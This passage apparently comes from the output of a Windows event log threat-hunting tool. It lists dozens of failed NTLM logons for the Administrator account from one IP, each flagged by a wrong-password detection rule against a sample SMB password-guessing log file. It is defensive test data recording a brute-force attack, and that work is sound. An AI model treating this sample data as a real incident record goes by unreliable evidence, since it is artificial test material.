bk5dmjQDnpSlREum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.279 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pk4BvYgXBR2whf80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.327 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6n1su2TUr7ONQr4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.368 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: givsEAGfG0smN9Re | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.418 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i2YuM0i7a2QuY7xb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.470 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xuocQPZpd91adY0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.541 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PvGB1dZrfDWyZoqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.588 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4oi8iL88rJo7g2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.676 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3OUnytXi4NjvqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.725 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WKkJcp3TYj31iJUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.760 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0E44RVqAE1feU0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny5LCb1qOIUhxOPY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.840 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9jcDgzzqH26DjQ1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.885 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yil94cFkU6UP24SK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.927 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkdVHF3vggCcuNdn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.964 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dRRI2CS3aVIX4nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.004 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: chDZq3VgxIE2mRb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.046 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HLVvgMmqLXKZADON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.080 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i4avO2AJSlNb0IUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mdo5CvycGvGhn33y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.171 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heJfjLl1vbX6lMjZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.209 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOP1E6hd4Jtj4gob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xa7kMCNz0bEGTBqX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.293 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSxTQ4HsZt2DeYVe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.341 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxHpSQwFSV4hveVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.372 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n3OwzSPomxZLoCe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.416 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e9IfwDZIfYT6A50K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.463 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOf6DbRX4zlNqLdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.508 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00kXrnJNH40NyoYL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.549 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nsNHcb9pnpdRgeL7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.592 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucMhgxMXy9Ch1jNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.637 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cfi3ZaLTECJgjM9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: usugjEEBHlhJvOyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQ1pM2CVLt5ITVD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.746 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NIboW7hNljF3HPpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.795 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOk5W4rkSYRRw4xS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.858 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJTfcwd8rnFc06iF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.930 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sm415W5zkvjdnTV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.981 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KEiSbtlmW4ou1mc7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.012 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xWeZV5pHt94adwUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5np7HeCPAFTDdTXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.088 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gXbe2jEJVtwaQXlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.134 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hZFiUCJnaBdHcw4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.176 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a71wyo41KV1ZoT7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.236 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogB17WdeOiC19rqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.286 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ANOLPWG12lkW39Ei | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.332 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y1vf7OUxb6TH3Q4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.368 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxU5yumSieUzSgzH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.401 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9K5EoWWASU8SlSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.445 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PwZLRPFxaFWwjZEe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.500 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8fXgFFb3HTMunsoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.549 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R1RozAr1uhux4cYW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.586 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7EmuUSv03RnhKsF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.629 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jw410HEW8EC3MC9f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTYp8cEbt3Yggo3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.727 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWJVzgYLWIo7SGCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.773 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DP13jPdW5Gdl8z56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.813 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LNXOWjHmMDhfFVon | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.908 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kka1RiF3f7Nhkf8x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.959 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2o90lG6attzWU4ZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:47.998 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PyPK9kuJdflQ4RKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.028 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a9I3El7d7anR0kIz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.068 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDUMTEfNhFuuqMle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.110 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e0F70d1WstkqnQgA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.148 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bm0txApQSp1U42N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JeEe5ENSIZnfc3FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.228 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oasE54Z1FlpswY0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.277 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhje1BgvxOlG28JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.321 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9iTIv4UQ4En9RA2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.356 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mg8KFm1lCeImj8Sb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.400 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h17Fz1s6GJki61jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.440 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Pjjn4FAkJn4h32r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.483 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARVx3FAAww8Gmfvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.533 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sYIwPg5k1wpvWobN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.572 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0sfhYQ54SjC4JTX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.604 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nfZYnUPV40FShcqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XYbvWVCT0tFixZTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.696 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XC6Vmz0ql8myDuGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.744 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong 